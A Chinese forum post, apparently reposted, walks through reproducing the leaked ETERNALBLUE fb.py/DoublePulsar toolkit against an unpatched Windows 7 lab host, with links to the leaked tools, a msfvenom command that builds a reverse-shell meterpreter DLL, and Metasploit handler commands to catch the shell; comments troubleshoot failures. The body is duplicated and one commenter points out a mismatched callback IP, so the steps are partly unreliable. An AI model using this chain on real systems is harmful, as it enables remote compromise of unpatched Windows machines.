方程式ETERNALBLUE 之fb.py的复现
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
评论135次
兄弟 你代发也细点心不要误导他人好么? 你有没有拿着流程去做测试? “利用msf生成一个dll劫持文件:” 这个部分哪里出来的1.131? 你生成131 dll试试 如果能成功就见鬼了,发帖子要负责任,不是复制粘贴
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
在fb.py同目录下,建一个listeningposts空文件夹就行了。
用的32位xi统 装的32位python 装了pywin32 建了文件夹了 重启了 最后出现这个情况
这个,绝对是环境的问题
Negotiate error code is:00000002 Sending X224 Connect request (negotiate protocol:Old RDP) SSL rejected - reverting to old style RDP - Warning: connection notencrypted Sending MCS Connect Initial request Received MCS Connect response Connected to target, pinging backdoor... Error receiving data packet Bytes received:0000 CNESocket error:00050011 OsError:00002746 Error reading from socket Closing and cleaning up RDP session Plugin failed Error: Doublepulsar Failed这是个什么情况
不存在
Negotiate error code is:00000002 Sending X224 Connect request (negotiate protocol:Old RDP) SSL rejected - reverting to old style RDP - Warning: connection notencrypted Sending MCS Connect Initial request Received MCS Connect response Connected to target, pinging backdoor... Error receiving data packet Bytes received:0000 CNESocket error:00050011 OsError:00002746 Error reading from socket Closing and cleaning up RDP session Plugin failed Error: Doublepulsar Failed这是个什么情况
这好像就是漏洞不存在
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
在fb.py同目录下,建一个listeningposts空文件夹就行了。
python2.6是装的32位吗?pywin32 都需要的
用的32位xi统 装的32位python 装了pywin32 建了文件夹了 重启了 最后出现这个情况
[-] Negotiate error code is:00000002 [.] Sending X224 Connect request (negotiate protocol:Old RDP) [.] SSL rejected - reverting to old style RDP - Warning: connection not encrypted [.] Sending MCS Connect Initial request [.] Received MCS Connect response [+] Connected to target, pinging backdoor... [-] Error receiving data packet [-] Bytes received:0000 CNESocket error:00050011 OsError:00002746 [-] Error reading from socket [.] Closing and cleaning up RDP session [!] Plugin failed [-] Error: Doublepulsar Failed 这是个什么情况
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
在fb.py同目录下,建一个listeningposts空文件夹就行了。
我建文件夹了呀,完全按照教程来的
python2.6是装的32位吗?pywin32 都需要的
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
在fb.py同目录下,建一个listeningposts空文件夹就行了。
我建文件夹了呀,完全按照教程来的
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
在fb.py同目录下,建一个listeningposts空文件夹就行了。
请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年
注释一下就好
要狂就狂这一回,我也称年爱谁谁?
我已成年 爱谁谁
配置一样,msf监听不了,目标机一分钟后重启,试了两次了,都是这样
lsass.exe 进程名改掉
请问这个情况是应该把代码注释掉么? 真没发现上面有和我一样的问题啊 @我已成年
配置一样,msf监听不了,目标机一分钟后重启,试了两次了,都是这样
win7和你一样,dll注入到xi统的进程,一分钟自动重启了。。。
mac 64位,怎么执行 32位的?
这个就不知道了
mac 64位,怎么执行 32位的?
试了一下,还是坐等出个好用点的exp吧。。。。
空欢喜一场啊,还以为可以日遍内网,结果隔壁的抠脚大汉用win10不受影响
Traceback (most recent call last): File "fb.py", line 37, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Python26\windows\fuzzbunch\edfplugin.py", line 5, in <module> import edfexecution File "C:\Python26\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: DLL load failed: %1 不是有效的 Win32 应用程序。搞了2小时,各种出错
py版本必须32位的
win7 64可以成功,靶机是win10 没成功